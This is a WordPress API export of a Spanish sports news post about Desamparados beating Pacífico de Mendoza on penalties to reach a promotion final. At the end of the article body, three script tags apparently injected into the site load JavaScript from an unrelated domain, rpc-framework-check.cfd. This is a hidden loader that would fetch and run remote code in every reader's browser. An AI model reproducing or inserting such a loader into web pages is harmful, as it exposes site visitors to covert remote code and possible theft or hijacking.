{"id":22246,"date":"2025-02-02T23:48:37","date_gmt":"2025-02-03T02:48:37","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=22246"},"modified":"2026-02-02T19:17:46","modified_gmt":"2026-02-02T22:17:46","slug":"en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a","status":"publish","type":"post","link":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/","title":{"rendered":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Desamparados se jug\u00f3 el todo por el todo ante Pac\u00edfico de Mendoza y logr\u00f3 el sue\u00f1o de llegar a la final con Ben Hur en Pergamino.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El encuentro, disputado en un Serpentario repleto de hinchas, fue electrizante. En el primer tiempo, el equipo sanjuanino logr\u00f3 igualar la serie tras el resultado adverso obtenido en Mendoza el fin de semana pasado. Sin embargo, no todo fue favorable, ya que un jugador de Desamparados fue expulsado, lo que gener\u00f3 fuertes cr\u00edticas hacia el arbitraje.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El tiempo reglamentario finaliz\u00f3 2 a 0, llevando la definici\u00f3n a los penales en un desenlace de infarto. En la primera tanda de cinco disparos, ambos equipos convirtieron todos sus intentos, forzando una definici\u00f3n mano a mano. Finalmente, Pac\u00edfico no logr\u00f3 convertir su \u00faltimo penal, lo que sell\u00f3 la victoria de Desamparados y su clasificaci\u00f3n a la final del ascenso.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El Serpentario se transform\u00f3 en una fiesta, con los hinchas celebrando la heroica clasificaci\u00f3n de su equipo. Ahora, Desamparados se prepara para enfrentar a Ben Hur en Pergamino, con la ilusi\u00f3n intacta de lograr el ascenso al Federal A.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Foto gentileza: Tiempo de San Juan<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Desamparados se jug\u00f3 el todo por el todo ante Pac\u00edfico de Mendoza y logr\u00f3 el sue\u00f1o de llegar a la final con Ben Hur en Pergamino. El encuentro, disputado en un Serpentario repleto de hinchas, fue electrizante. En el primer tiempo, el equipo sanjuanino logr\u00f3 igualar la serie tras el resultado adverso obtenido en Mendoza [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":22247,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,2,182],"tags":[],"class_list":["post-22246","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacada","category-featured","category-regional-amateur"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Desamparados se jug\u00f3 el todo por el todo ante Pac\u00edfico de Mendoza y logr\u00f3 el sue\u00f1o de llegar a la final con Ben Hur en Pergamino. El encuentro, disputado en un Serpentario repleto de hinchas, fue electrizante. En el primer tiempo, el equipo sanjuanino logr\u00f3 igualar la serie tras el resultado adverso obtenido en Mendoza [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-02-03T02:48:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:17:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"790\" \/>\n\t<meta property=\"og:image:height\" content=\"527\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A\",\"datePublished\":\"2025-02-03T02:48:37+00:00\",\"dateModified\":\"2026-02-02T22:17:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/\"},\"wordCount\":211,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp\",\"articleSection\":[\"destacada\",\"Featured\",\"Regional Amateur\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/\",\"name\":\"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp\",\"datePublished\":\"2025-02-03T02:48:37+00:00\",\"dateModified\":\"2026-02-02T22:17:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp\",\"contentUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp\",\"width\":790,\"height\":527},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/02\\\/02\\\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/","og_locale":"es_ES","og_type":"article","og_title":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes","og_description":"Desamparados se jug\u00f3 el todo por el todo ante Pac\u00edfico de Mendoza y logr\u00f3 el sue\u00f1o de llegar a la final con Ben Hur en Pergamino. El encuentro, disputado en un Serpentario repleto de hinchas, fue electrizante. En el primer tiempo, el equipo sanjuanino logr\u00f3 igualar la serie tras el resultado adverso obtenido en Mendoza [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-02-03T02:48:37+00:00","article_modified_time":"2026-02-02T22:17:46+00:00","og_image":[{"width":790,"height":527,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A","datePublished":"2025-02-03T02:48:37+00:00","dateModified":"2026-02-02T22:17:46+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/"},"wordCount":211,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp","articleSection":["destacada","Featured","Regional Amateur"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/","name":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp","datePublished":"2025-02-03T02:48:37+00:00","dateModified":"2026-02-02T22:17:46+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#primaryimage","url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp","contentUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/02\/9ec890ad-bd95-4d98-9aa3-2c24e0ebd5aajpg.webp","width":790,"height":527},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/02\/02\/en-los-penales-desamparados-vencio-a-pacifico-y-jugara-la-final-para-ascender-al-federal-a\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"En los penales, Desamparados venci\u00f3 a Pac\u00edfico y jugar\u00e1 la final para ascender al Federal A"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"http:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22246","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=22246"}],"version-history":[{"count":4,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22246\/revisions"}],"predecessor-version":[{"id":29106,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22246\/revisions\/29106"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/22247"}],"wp:attachment":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=22246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=22246"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=22246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}